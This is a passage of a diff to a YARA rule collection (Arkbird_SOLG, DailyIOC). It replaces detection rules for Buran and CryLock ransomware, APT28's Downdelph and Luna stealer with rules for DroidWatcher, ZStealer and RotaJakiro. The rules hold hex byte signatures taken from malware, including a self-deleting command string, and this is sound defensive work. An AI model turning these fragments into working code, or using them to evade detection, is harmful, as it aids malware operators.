a3 00 00 00 33 c0 55 68 [3] 00 64 ff 30 64 89 20 c7 45 f8 00 02 00 00 8d 45 f8 50 8d 85 ec fc ff ff 50 6a 00 6a 00 68 [3] 00 8b 45 f4 50 e8 [3] ff 85 c0 75 4f 8d 85 60 fc ff ff 8d 95 ec fc ff ff b9 00 01 00 00 e8 [3] ff 8b 95 60 fc ff ff 8b 45 ec 8b 08 8b 45 fc 8b 40 44 8b 18 ff 53 40 8b 45 ec 8b 00 8b 55 fc 3b 42 4c 75 16 8b 45 fc 83 c0 48 8d 95 ec fc ff ff b9 00 01 00 00 e8 [3] ff 33 c0 5a 59 59 64 89 10 68 [3] 00 8b 45 f4 50 e8 [3] ff } + $seq2 = { 55 8b ec 81 c4 e4 fd ff ff 53 8b da 89 45 fc 8b 45 fc e8 [2] ff ff 33 c0 55 68 [2] 40 00 64 ff 30 64 89 20 83 7d fc 00 75 15 68 05 01 00 00 8d 85 e6 fd ff ff 50 6a 00 e8 [2] ff ff eb 1a 8b 45 fc e8 [2] ff ff 8b c8 8d 85 e6 fd ff ff ba 05 01 00 00 e8 da f7 ff ff 66 83 bd e6 fd ff ff 00 0f 84 a7 01 00 00 33 c0 89 45 f8 8d 45 f4 50 68 19 00 0f 00 6a 00 68 [2] 40 00 68 01 00 00 80 e8 [2] ff ff 85 c0 0f 84 9a 00 00 00 8d 45 f4 50 68 19 00 0f 00 6a 00 68 [2] 40 00 68 02 00 00 80 e8 2b 5e ff ff 85 c0 74 7c 8d 45 f4 50 68 19 00 0f 00 6a 00 68 70 f6 40 00 68 01 00 00 80 e8 0d 5e ff ff 85 c0 74 5e 8d 45 f4 50 68 19 00 0f 00 6a 00 68 70 f6 40 00 68 02 00 00 80 e8 [2] ff ff 85 c0 74 40 8d 45 f4 50 68 19 00 0f 00 6a 00 68 [2] 40 00 68 01 00 00 80 e8 [2] ff ff 85 c0 74 22 8d 45 f4 50 68 19 00 0f 00 6a 00 68 [2] 40 00 68 01 00 00 80 e8 [2] ff ff 85 c0 0f 85 e6 00 00 00 33 c0 55 68 [2] 40 00 64 ff 30 64 89 20 8d 85 e6 fd ff ff ba 05 01 00 00 e8 c9 fc ff ff 8d 45 f0 50 6a 00 6a 00 6a 00 8d 85 e6 fd ff ff 50 8b 45 f4 50 e8 [2] ff ff 85 c0 75 33 8b 45 f0 e8 [2] ff ff 89 45 f8 8d 45 f0 50 8b 45 f8 50 6a 00 6a 00 8d 85 e6 fd ff ff 50 8b 45 f4 50 e8 [2] ff ff 8b c3 8b 55 f8 e8 [2] ff ff eb 4b 8d 45 f0 50 6a 00 6a 00 6a 00 68 [2] 40 00 8b 45 f4 50 e8 [2] ff ff 85 c0 75 2f 8b 45 f0 e8 [2] ff ff 89 45 f8 8d 45 f0 50 8b 45 f8 50 6a 00 6a 00 68 [2] 40 00 8b 45 f4 50 e8 [2] ff ff 8b c3 8b 55 f8 e8 [2] ff ff 33 c0 5a 59 59 64 89 10 68 [2] 40 00 83 7d f8 00 74 08 8b 45 f8 e8 [2] ff ff 8b 45 f4 50 e8 [2] ff ff } + $seq3 = { d1 f8 79 03 83 d0 00 03 45 80 89 45 d0 8b 45 a4 8b 80 e4 02 00 00 8b 40 10 01 45 d0 8b 45 a4 8b 80 e4 02 00 00 8b 40 04 29 45 d0 8b 75 8c 2b 75 d4 83 ee 02 8b 45 a4 8b 80 e4 02 00 00 2b 70 08 8b 45 a4 8b 80 e4 02 00 00 2b 70 0c 89 75 8c 6a 00 56 8b 45 d0 50 8b 45 ec e8 [2] fb ff 50 57 8b 85 68 ff ff ff 50 e8 [2] fc ff 84 db 0f 84 0d 03 00 00 a1 [3] 00 8b 00 e8 [2] 09 00 50 8b 45 b4 50 6a 23 e8 [3] ff 89 45 d8 8b 45 d8 01 45 90 83 45 94 0f 83 45 90 05 8b 45 f0 8b 40 08 8b 50 74 } + $s1 = "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x" fullword wide + $s2 = { 45 00 72 00 72 00 6f 00 72 00 20 00 63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 69 00 6e 00 67 00 20 00 74 00 6f 00 20 00 73 00 65 00 72 00 76 00 65 00 72 00 3a 00 20 00 25 00 73 } + $s3 = { 45 00 72 00 72 00 6f 00 72 00 20 00 6f 00 70 00 65 00 6e 00 69 00 6e 00 67 00 20 00 72 00 65 00 71 00 75 00 65 00 73 00 74 00 3a 00 20 00 28 00 25 00 64 00 29 00 20 00 25 00 73 } + $s4 = { 43 00 61 00 6e 00 6e 00 6f 00 74 00 20 00 6f 00 70 00 65 00 6e 00 20 00 66 00 69 00 6c 00 65 00 20 00 22 00 25 00 73 00 22 00 2e 00 20 00 25 00 73 } + $s5 = { 43 00 61 00 6e 00 6e 00 6f 00 74 00 20 00 6f 00 70 00 65 00 6e 00 20 00 63 00 6c 00 69 00 70 00 62 00 6f 00 61 00 72 00 64 00 3a 00 20 00 25 00 73 } condition: - uint16(0)==0x5a4d and filesize <300KB and (pe.imphash()=="dbdfe8b60c1de0a9201044b3e91b9502" or 12 of them ) + uint16(0)==0x5a4d and filesize >500KB and 2 of ($seq*) and 3 of ($s*) } -rule ARKBIRD_SOLG_Ran_Buran_Oct_2020_1 : FILE +rule ARKBIRD_SOLG_APK_Droidwatcher_Nov_2021_1 : FILE { meta: - description = "Detect Buran ransomware" + description = "Detect modified DroidWatcher stealer used by Void Balaur group" author = "Arkbird_SOLG" - id = "dbdc251e-9ac6-5de1-8a72-72ac159daf4c" - date = "2020-11-05" - modified = "2020-11-06" - reference = "https://twitter.com/JAMESWT_MHT/status/1323956405976600579" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-06/Buran/Ran_Buran_Oct_2020_1.yar#L1-L22" + id = "04e02521-d89a-5f72-8b6f-0350f6defdd0" + date = "2021-11-11" + modified = "2021-11-12" + reference = "https://documents.trendmicro.com/assets/white_papers/wp-void-balaur-tracking-a-cybermercenarys-activities.pdf" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-11/Void_Balaur/APK_DroidWatcher_Nov_2021_1.yara#L1-L19" license_url = "N/A" - logic_hash = "a6984d21451c980d001e040325c66b547060653ac97556bc379da40f3ab6a70a" - score = 75 + logic_hash = "c16bcdd5d9cd6a3cbb527893e13ac967211d1686edd9f7ae03e37feada725a1b" + score = 50 quality = 75 tags = "FILE" - hash1 = "66fc6e71a9c6be1f604c4a2d0650914f67c45d894fd1f76913e463079d47a8af" - hash2 = "93fe277d54f4baac5762412dda6f831bf6a612f166daade7c23f6b38feac94fb" - hash3 = "b3302c4a9fd06d9fde96c9004141f80e0a9107a9dead1659e77351f1b1c87cf6" - hash4 = "eb920e0fc0c360abb901e04dce172459b63bbda3ab8152350885db4b44d63ce5" - hash5 = "f247ae6db52989c9a598c3c7fbc1ae2db54f5c65be862880e11578b8583731cb" - hash6 = "29cdd5206422831334afa75c113b615bb8e0121254dd9a2196703ce6b1704ff8" - - strings: - $s1 = "!!! LOCALPUBKEY !!!" fullword ascii - $s2 = "!!! ENCLOCALPRIVKEY !!!" fullword ascii - $s3 = "!!! D !!!" fullword ascii - $s4 = { 8b 85 74 fd ff ff 8b 40 04 85 c0 74 05 83 e8 04 8b 00 8d 55 f4 92 e8 c1 aa fe ff 8b 85 74 fd ff ff 8b 78 04 85 ff 74 05 83 ef 04 8b 3f 8d 45 f4 e8 d3 a8 fe ff 8b d0 8b cf 8b 85 50 fd ff ff 8b 38 ff 57 0c 6a 00 6a 00 33 d2 8b 85 50 fd ff ff 8b 08 ff 51 18 8b 45 f4 8b 95 74 fd ff ff 8b 52 04 e8 da a7 fe ff 0f 84 7d 07 00 00 ff b5 4c fd ff ff ff b5 48 fd ff ff 33 d2 8b 85 50 fd ff ff 8b 08 ff 51 18 8b 85 74 fd ff ff 8b 78 04 85 ff 74 05 83 ef 04 8b 3f 8b 85 74 fd ff ff 83 c0 04 e8 63 a8 fe ff 8b d0 8b cf 8b 85 50 fd ff ff 8b 38 ff 57 10 6a 00 6a 00 33 d2 8b 85 50 fd ff ff 8b 08 ff 51 18 8b 85 74 fd ff ff 8b 78 04 85 ff 74 05 83 ef 04 8b 3f 8b 85 50 fd ff ff 8b 10 ff 12 52 50 8b c7 99 03 85 48 fd ff ff 13 95 4c fd ff ff 3b 54 24 04 75 03 3b 04 24 5a 58 0f 85 dc 06 00 00 ff b5 4c fd ff ff ff b5 48 fd ff ff 8b 85 50 fd ff ff e8 e6 cc fe ff 8b 85 74 fd ff ff 8b 40 28 85 c0 74 09 83 f8 0a 0f 85 00 01 00 00 8b 85 74 fd ff ff 83 c0 1c e8 fe a2 fe ff 8b 85 74 fd ff ff 83 c0 20 e8 f0 a2 fe ff c7 85 44 fd ff ff 01 00 00 00 b8 00 01 00 00 e8 78 44 ff ff 8b d0 8d 85 10 fd ff ff e8 b7 a4 fe ff 8b 95 10 fd ff ff 8b 85 74 fd ff ff 83 c0 20 e8 63 a5 fe ff 83 bd 44 fd ff ff 10 7f 2b b8 00 01 00 00 e8 44 44 ff ff 8b d0 8d 85 0c fd ff ff e8 83 a4 fe ff 8b 95 0c fd ff ff 8b 85 74 fd ff ff 83 c0 1c e8 2f a5 fe ff ff 85 44 fd ff ff 83 bd 44 fd ff ff 21 75 92 8b 85 74 fd ff ff 83 c0 24 50 8b 85 74 fd ff ff 8b 48 1c 8b 85 74 fd ff ff 8b 50 20 8d 85 08 fd ff ff e8 45 a5 fe ff 8b 85 08 fd ff ff 8b 95 74 fd ff ff 8d 4a 0c 8b 95 74 fd ff ff 83 c2 14 e8 c8 8f ff ff 8d 95 04 fd ff ff 8b 85 74 fd ff ff 8b 40 24 e8 0c 5c ff ff 8b 95 04 fd ff ff 8b 85 74 fd ff ff 83 c0 24 e8 60 a2 fe ff 8b 85 74 fd ff ff 83 78 28 0a 75 0d 8b 85 74 fd ff ff 33 d2 89 50 28 eb 09 8b 85 74 fd ff ff ff 40 28 8b c3 99 52 50 8b 85 48 fd ff ff 8b 95 4c fd ff ff e8 54 b2 fe ff 89 85 38 fd ff ff 89 95 3c fd ff ff 8b c3 99 52 50 8b 85 38 fd ff ff 8b 95 3c fd ff ff e8 0e b2 fe ff 52 50 8b c6 99 3b 54 24 04 75 09 3b 04 24 5a 58 73 18 eb 04 5a 58 7d 12 8b c6 99 f7 fb 99 89 85 38 fd ff ff 89 95 3c fd ff ff 83 bd 3c fd ff ff 00 75 07 83 bd 38 fd ff ff 00 74 31 ff b5 3c fd ff ff ff b5 38 fd ff ff 8b 85 48 fd ff ff 8b 95 4c fd ff ff e8 d9 b1 fe ff 89 85 30 fd ff ff 89 95 34 fd ff ff 89 9d 2c fd ff ff eb 38 c7 85 38 fd ff ff 01 00 00 00 c7 85 3c fd ff ff 00 00 00 00 8b 85 48 fd ff ff 89 85 30 fd ff ff 8b 85 4c fd ff ff 89 85 34 fd ff ff 8b 85 48 fd ff ff 89 85 2c fd ff ff 8d 45 f0 e8 05 a1 fe ff b2 01 a1 98 6f 40 00 e8 61 94 fe ff 89 85 1c fd ff ff 8b 9d 38 fd ff ff 85 db 0f 8e 9f 00 00 00 c7 85 44 fd ff ff 01 00 00 00 ff b5 34 fd ff ff ff b5 30 fd ff ff 8b 85 44 fd ff ff 48 99 e8 1e b1 fe ff 89 85 20 fd ff ff 89 95 24 fd ff ff 8d 95 20 fd ff ff b9 08 00 00 00 8b 85 1c fd ff ff 8b 30 ff 56 10 ff b5 24 fd ff ff ff b5 20 fd ff ff 33 d2 8b 85 50 fd ff ff 8b 08 ff 51 18 8d 45 f4 8b 95 2c fd ff ff e8 19 a7 fe ff 8d 45 f4 e8 3d a5 fe ff 8b d0 8b 8d 2c fd ff ff 8b 85 50 fd ff ff e8 e6 ca fe ff 8d 45 f0 8b 55 f4 e8 fb a2 fe ff ff 85 44 fd ff ff 4b 0f 85 6b ff ff ff 6a 00 6a 00 33 d2 8b 85 1c fd ff ff 8b 08 ff 51 18 8d 45 ec e8 2d a0 fe ff 8b 85 1c fd ff ff 8b 10 ff 12 89 85 18 fd ff ff 8d 45 ec 8b 95 18 fd ff ff e8 af a6 fe ff 8d 45 ec e8 d3 a4 fe ff 8b d0 8b 8d 18 fd ff ff 8b 85 1c fd ff ff 8b 18 ff 53 } - $s5 = ": :(:,:0:4:8:<:@:D:H:\\:|:" fullword ascii - $s6 = " remove '.' from {.$DEFINE ComplexBraces}" fullword ascii - - condition: - uint16(0)==0x5a4d and filesize >100KB and 4 of them -} -rule ARKBIRD_SOLG_RAN_Crylock_July_2021_1 : FILE -{ - meta: - description = "Detect CryLock ransomware (ex-Cryakl)" - author = "Arkbird_SOLG" - id = "350bd622-f4b5-5837-a239-dc506b100aef" - date = "2021-07-17" - modified = "2021-07-17" - reference = "https://twitter.com/BushidoToken/status/1415958829318217730" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-16/Crylock/RAN_Crylock_July_2021_1.yara#L1-L23" - license_url = "N/A" - logic_hash = "4f5046a64e7491085a55d8d1f2b5b056dc0aa89fcdea47652ecb7db680de2f59" - score = 75 - quality = 65 - tags = "FILE" - hash1 = "a962501ea4cd363dd588c948ff8b0ab24aa4132ff58f4a7806af06efa3b791ef" - hash2 = "1c2975dd464d014502a46ba6383943c7de4635e3664011653217dc424d53f8fe" - hash3 = "e001f6a5b2d4d2659b010fb5825eb4383e8f415861a244329bc70cfcd18da507" - tlp = "White" - adversary = "RAAS" + hash1 = "902c5f46ac101b6f30032d4c5c86ecec115add3605fb0d66057130b6e11c57e6" + tlp = "white" + level = "Experimental" + adversary = "Void Balaur" strings: - $s1 = { 2f 63 20 22 70 69 6e 67 20 30 2e 30 2e 30 2e 30 26 64 65 6c 20 22 } - $s2 = { 7b 45 4e 43 52 59 50 54 53 54 41 52 54 7d 7b } - $s3 = { 7b 45 4e 43 52 59 50 54 45 4e 44 45 44 7d } - $s4 = { 2f 2f 2f 45 4e 44 20 55 4e 45 4e 43 52 59 50 54 20 45 58 54 45 4e 41 54 49 4f 4e 53 5c 5c 5c 00 ff ff ff ff 17 00 00 00 2f 2f 2f 45 4e 44 20 43 4f 4d 4d 41 4e 44 53 20 4c 49 53 54 5c 5c 5c 00 ff ff ff ff 1d 00 00 00 2f 2f 2f 45 4e 44 20 50 52 4f 43 45 53 53 45 53 20 4b 49 4c 4c 20 4c 49 53 54 5c 5c 5c 00 00 00 ff ff ff ff 1c 00 00 00 2f 2f 2f 45 4e 44 20 53 45 52 56 49 43 45 53 20 53 54 4f 50 20 4c 49 53 54 5c 5c 5c 00 00 00 00 ff ff ff ff 1e 00 00 00 2f 2f 2f 45 4e 44 20 50 52 4f 43 45 53 53 45 53 20 57 48 49 54 45 20 4c 49 53 54 5c 5c 5c 00 00 ff ff ff ff 1e 00 00 00 2f 2f 2f 45 4e 44 20 55 4e 45 4e 43 52 59 50 54 20 46 49 4c 45 53 20 4c 49 53 54 5c 5c 5c 00 00 ff ff ff ff 20 00 00 00 2f 2f 2f 45 4e 44 20 55 4e 45 4e 43 52 59 50 54 20 46 4f 4c 44 45 52 53 20 4c 49 53 54 5c 5c 5c } - $s5 = { 49 45 28 41 4c 28 22 25 73 22 2c 34 29 2c 22 41 4c 28 5c 22 25 30 3a 73 5c 22 2c 33 29 22 2c 22 4a 4b 28 5c 22 25 31 3a 73 5c 22 2c 5c 22 25 30 3a 73 5c 22 29 22 29 } - $s6 = { 3c 25 55 4e 44 45 43 52 59 50 54 5f 44 41 54 45 54 49 4d 45 25 3e } - $s7 = { 25 00 73 00 20 00 28 00 25 00 73 00 2c 00 20 00 6c 00 69 00 6e 00 65 00 20 00 25 00 64 00 29 } + $s1 = { 38 50 F4 59 CC FF F3 37 65 28 4F 35 1A D2 83 C9 6C E0 20 27 38 C5 39 2E 72 95 5B 3C E0 29 D1 9E C7 0C A4 21 1B 55 09 A5 0B 83 99 C8 7C D6 F2 0F 47 B9 CE 43 82 5E C4 0C } + $s2 = { 3C E2 39 81 D4 EA 82 1F F8 83 42 54 A0 2E 6D E8 C5 44 E6 B0 92 13 5C E6 21 EF 89 9D 26 28 90 8C 3C 94 A3 36 AD E9 CD 48 26 B2 92 1D 1C E4 34 57 B9 C7 2B A2 7D 1E 14 A8 4A 4D 5A D3 8E 2E F4 A4 1F 83 19 C1 58 A6 32 9B 05 2C 63 03 DB B9 42 } + $s3 = { F0 96 6F 33 59 1B BA 32 82 8D 5C 22 28 B3 1E 4C 65 BA 31 99 4D 1C E0 2E 89 7E F3 1E 94 A7 13 13 08 E7 22 31 7E D7 EB 28 42 53 46 B0 81 73 7C 22 E3 1F 62 4E 17 66 B2 8F 47 A4 CA A2 D6 68 C9 44 36 72 9D 78 7F 7A 16 B5 18 CA 5A 4E F2 92 74 59 } + $s4 = { 3D 57 89 56 4D 9E 51 9C CE 2C 20 92 B8 D5 C5 81 7A 8C 65 03 17 F9 C0 77 35 5C 4F 0B 26 B0 99 0B C4 A9 69 5D A9 44 0F 66 F2 2F F7 48 5C 4B 7E 50 9D 41 2C E0 34 AF 89 5F 5B 9E 50 92 C6 F4 65 3C 0B D8 CA 1E CE F3 80 CF EA B8 9E 94 A4 E5 37 72 51 88 0A 34 A3 2F 03 19 CE 41 22 B8 C9 5D 1E F2 82 77 44 AF AB } + $s5 = { FA D6 A4 0F EB 79 42 D2 76 F6 54 BA B2 9A 27 FC D0 5E 9E 30 8D 2B 24 E9 A0 AE A8 41 33 06 32 84 51 8C 63 12 33 98 CF 72 36 B0 8B 83 1C E3 12 D7 B8 CD 63 5E 13 B3 A3 FE 45 06 8A D0 80 3E 0C 66 32 33 59 C6 66 0E 10 C1 39 AE F3 84 D7 C4 EF E4 EC C8 37 64 22 17 F9 28 42 45 3A 31 9E A5 EC E1 14 37 79 C0 DB FF FD B6 B3 E7 F3 3B 45 A9 45 28 E3 D9 } condition: - uint16(0)==0x5a4d and filesize >80KB and 6 of ($s*) + uint32be(0)==0x504B0304 and filesize >300KB and 4 of them } -rule ARKBIRD_SOLG_APT_APT28_Downdelph_Feb_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_Zstealer_Nov_2021_1 : FILE { meta: - description = "Detect Downdelph used by APT28 group" + description = "Detect ZStealer stealer used by Void Balaur group" author = "Arkbird_SOLG" - id = "0376c026-93eb-526a-8ab3-26bdd365e608" - date = "2021-02-18" - modified = "2021-02-19" - reference = "https://twitter.com/RedDrip7/status/1362343352759250946" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-18/APT28/APT_APT28_Downdelph_Feb_2021_1.yar#L1-L18" + id = "0282884b-569a-5e46-a6ad-d2776ff71ddb" + date = "2021-11-11" + modified = "2021-11-12" + reference = "https://documents.trendmicro.com/assets/white_papers/wp-void-balaur-tracking-a-cybermercenarys-activities.pdf" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-11/Void_Balaur/MAL_ZStealer_Nov_2021_1.yara#L1-L19" license_url = "N/A" - logic_hash = "15e38ceeb0410645938ce2f90becf9a344711efd6e539f304de7b413f6f3b420" + logic_hash = "c3bec4fb8338ad71577e63f81c22b5d250083f2475f60610de8dccd4979035d3" score = 75 quality = 75 tags = "FILE" - hash1 = "ee7cfc55a49b2e9825a393a94b0baad18ef5bfced67531382e572ef8a9ecda4b" + hash1 = "af89d85a3b579ac754850bd6e52e7516c2e63141107001463486cd01bc175052" + hash2 = "5a2c9060f6cc1e6e0fd09b2b194631d2c7e7f024d9e2d3a9be64570e263f565f" + tlp = "white" + adversary = "Void Balaur" strings: - $s1 = { 53 [1-3] 81 c4 [2] ff ff 8b f2 8b ?? 54 8d 44 24 08 50 68 04 01 00 00 8b ?? e8 [12-22] 8d 54 24 04 8b c6 [73-133] 33 d2 52 50 8b 45 e8 8b 55 ec e8 [3] ff 8b 4d 0c 89 01 89 51 04 8b 45 f0 33 d2 52 50 8b 45 e8 8b 55 ec e8 [3] ff 8b 4d 10 89 01 89 51 04 8b c3 5b 8b e5 5d } - $s2 = "cmd.exe /c " fullword ascii - $s3 = "Failed to Save Stream %s is already associated with %s=This control requires version 4.70 or greater of COMCTL32.DLL" fullword wide - $s4 = { 53 00 79 00 73 00 74 00 65 00 6d 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 53 00 65 00 74 00 5c 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 5c 00 4b 00 65 00 79 00 62 00 6f 00 61 00 72 00 64 00 20 00 4c 00 61 00 79 00 6f 00 75 00 74 00 73 00 5c 00 25 00 2e 00 38 00 78 } - $s5 = { 4a 00 50 00 45 00 47 00 20 00 65 00 72 00 72 00 6f 00 72 00 20 00 23 00 25 00 64 } - $s6 = { 45 00 72 00 72 00 6f 00 72 00 20 00 63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 69 00 6e 00 67 00 20 00 74 00 6f 00 20 00 73 00 65 00 72 00 76 00 65 00 72 00 3a 00 20 00 25 00 73 } + $s1 = { 53 33 c0 55 68 71 d3 46 00 64 ff 30 64 89 20 a1 80 7f 7b 00 8b 10 ff 52 44 a1 84 7f 7b 00 8b 10 ff 52 44 8d 45 fc 50 68 80 d3 46 00 68 02 00 00 80 e8 e3 a3 f9 ff 85 c0 0f 85 94 01 00 00 8d 45 f8 ba 00 10 00 00 e8 86 83 f9 ff c7 45 f0 00 10 00 00 33 db e9 49 01 00 00 8d 45 f4 50 6a 00 8d 45 f8 e8 36 82 f9 ff 8d 55 e8 e8 e6 cd f9 ff 8b 4d e8 8d 45 ec ba bc d3 46 00 e8 12 80 f9 ff 8b 55 ec b9 fc d3 46 00 b8 02 00 00 80 e8 d4 d8 ff ff 84 c0 0f 84 01 01 00 00 8d 55 e4 8b 45 f4 e8 c5 c0 f9 ff 8b 55 e4 8d 45 f4 e8 6e 7d f9 ff 8b 55 f4 b8 14 d4 46 00 e8 cd 82 f9 ff 85 c0 7e 32 8d 45 e0 50 8b 55 f4 b8 14 d4 46 00 e8 b8 82 f9 ff 8b c8 83 c1 03 ba 01 00 00 00 8b 45 f4 e8 c2 81 f9 ff 8b 55 e0 a1 80 7f 7b 00 8b 08 ff 51 38 eb 0d 8b 55 f4 a1 80 7f 7b 00 8b 08 ff 51 38 8d 45 f4 50 6a 00 8d 45 f8 e8 90 81 f9 ff 8d 55 d8 e8 40 cd f9 ff 8b 4d d8 8d 45 dc ba bc d3 46 00 e8 6c 7f f9 ff 8b 55 dc b9 24 d4 46 00 b8 02 00 00 80 e8 2e d8 ff ff 84 c0 74 42 8d 45 f8 } + $s2 = { 8b d9 88 55 fb 89 45 fc 33 c0 55 68 b3 2e 46 00 64 ff 30 64 89 20 33 d2 8b 45 fc e8 a0 11 fa ff b2 01 a1 2c 74 41 00 e8 94 11 fa ff 8b 55 fc 89 42 0c 8b 45 fc c6 40 08 00 33 c0 89 45 f4 33 d2 55 68 96 2e 46 00 64 ff 32 64 89 22 8d 45 f0 89 5d ec 8b 55 ec e8 9e 21 fa ff 8b 45 fc 83 c0 04 50 8b 45 f0 e8 b7 25 fa ff 50 e8 2d f5 ff ff 83 c4 08 85 c0 74 66 8b 45 fc 8b 40 04 85 c0 74 39 50 e8 26 f5 ff ff 59 89 45 f4 89 5d dc c6 45 e0 0b 8b 45 f4 89 45 e4 c6 45 e8 06 8d 45 dc 50 6a 01 b9 e4 2e 46 00 b2 01 a1 58 2c 46 00 e8 be a1 fa ff e8 9d 19 fa ff eb 23 89 5d d4 c6 45 d8 0b 8d 45 d4 50 6a 00 b9 10 2f 46 00 b2 01 a1 58 2c 46 00 e8 99 a1 fa ff e8 78 19 fa ff 33 c0 5a 59 59 64 89 10 68 9d 2e 46 00 83 7d f4 00 74 0a 8b 45 f4 50 e8 c4 f4 ff ff } + $s3 = { 68 1d c7 45 00 64 ff 30 64 89 20 8b c3 e8 d8 89 fa ff 8d 45 fc ba 00 01 00 00 e8 17 90 fa ff c7 45 f8 ff 00 00 00 8d 45 f8 50 8d 45 fc e8 d0 8e fa ff 50 e8 f6 af fa ff c7 45 f4 ff 00 00 00 c7 45 f0 ff 00 00 00 8d 45 ec 50 8d 45 f0 50 8d 85 ec fd ff ff 50 8d 45 f4 50 8d 85 ec fe ff ff 50 8d 45 fc e8 9a 8e fa ff 50 6a 00 e8 d6 af fa ff 85 c0 0f 84 6d 01 00 00 8d 85 ec fe ff ff 50 e8 ba af fa ff 85 c0 0f 84 59 01 00 00 8d 85 ec fe ff ff 50 e8 7e af fa ff 8b f0 8d 85 ec fe ff ff 50 e8 80 af fa ff 0f b6 38 8b c3 ba 34 c7 45 00 e8 89 89 fa ff 80 3e 00 75 } + $s4 = { a1 9c c2 49 00 8b 00 e8 e3 82 01 00 8b 93 88 01 00 00 8b 08 ff 51 54 8b f8 85 ff 7c 15 a1 9c c2 49 00 8b 00 e8 c6 82 01 00 8b d7 8b 08 ff 51 18 8b f0 6a 01 56 e8 e1 f2 fc ff 8b c3 e8 be 17 00 00 8a 93 84 01 00 00 e8 2f 61 00 00 33 c0 5a 59 59 } + $s5 = { 45 72 72 6f 72 20 5b 25 64 5d 3a 20 25 73 2e 0d 22 25 73 22 3a 20 25 73 00 00 ff ff ff ff 0a 00 00 00 4e 6f 20 6d 65 73 73 61 67 65 } condition: - uint16(0)==0x5a4d and filesize >100KB and 5 of them + uint16(0)==0x5a4d and filesize >300KB and all of them } -rule ARKBIRD_SOLG_MAL_Luna_Stealer_Apr_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_ELF_Rotajakiro_May_2021_1 : FILE { meta: - description = "Detect Luna stealer (also Mercurial Grabber)" + description = "Detect the ELF version of RotaJakiro" author = "Arkbird_SOLG" - id = "2fecce99-5869-5de0-afae-6dc245748fa6" - date = "2021-08-29" - modified = "2021-08-30" - reference = "https://github.com/NightfallGT/Mercurial-Grabber" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Luna/MAL_Luna_Stealer_Apr_2021_1.yara#L1-L22" + id = "a67f9b64-8778-542f-8481-566a4ffaf5e8" + date = "2020-05-07" + modified = "2021-05-08" + reference = "https://blog.netlab.360.com/rotajakiro_linux_version_of_oceanlotus/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-08/RotaJakiro/MAL_ELF_RotaJakiro_May_2021_1.yara#L1-L21" license_url = "N/A" - logic_hash = "934ded815c262fa8bee38638e17ed8c2b1f0dcad28037bf1d525e11bf7e34dce" + logic_hash = "8e4b9ef8a908a13e738da31b28c879228c3bdc1d8461417b1c1bf31026c98abf" score = 75 quality = 75 tags = "FILE" - hash1 = "a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18" - hash2 = "93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f" - hash3 = "0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21" - hash4 = "ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a" + hash1 = "0958e1f4c3d14e4de380bda4c5648ab4fa4459ef8f5daaf32bb5f3420217af32" + hash2 = "5d753e72ef89f1cef3b7007df812c7a504727816a7b91ecd75cc9acdfb7e9c2e" + hash3 = "a18bec90b2b6185362eeb67c516c82dd34cd8f6a7423875921572e97ae1668b0" + hash4 = "af2a2be20d7bbec0a9bb4a4dfa898aa18ef4994a9791d7cf37b7b62b379992ac" + hash5 = "d38e8f113c36cfa9e05c4d0d6b526d81b69039430c3b1fc64a08a3445b5a5abe" tlp = "White" - adversary = "-" + adversary = "Oceanlotus" strings: - $s1 = { 73 ?? 00 00 0a 0b 07 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 0a 6f ?? 00 00 0a 0c 08 6f ?? 00 00 0a 6f ?? 00 00 0a 6f ?? 00 00 0a 0d 09 6f ?? 00 00 0a 0a 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 06 28 ?? 00 00 0a de 0a 07 2c 06 07 6f ?? 00 00 0a dc de 1a 13 04 72 [2] 00 70 11 04 6f ?? 00 00 0a 28 ?? 00 00 0a 28 ?? 00 00 0a de 00 2a } - $s2 = { 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 0a 02 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 7d ?? 00 00 04 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 0b 02 06 72 [2] 00 70 07 28 ?? 00 00 0a 7d ?? 00 00 04 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 0c 02 72 [2] 00 70 02 7b ?? 00 00 04 72 [2] 00 70 08 28 ?? 00 00 0a 7d ?? 00 00 04 02 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 02 7b 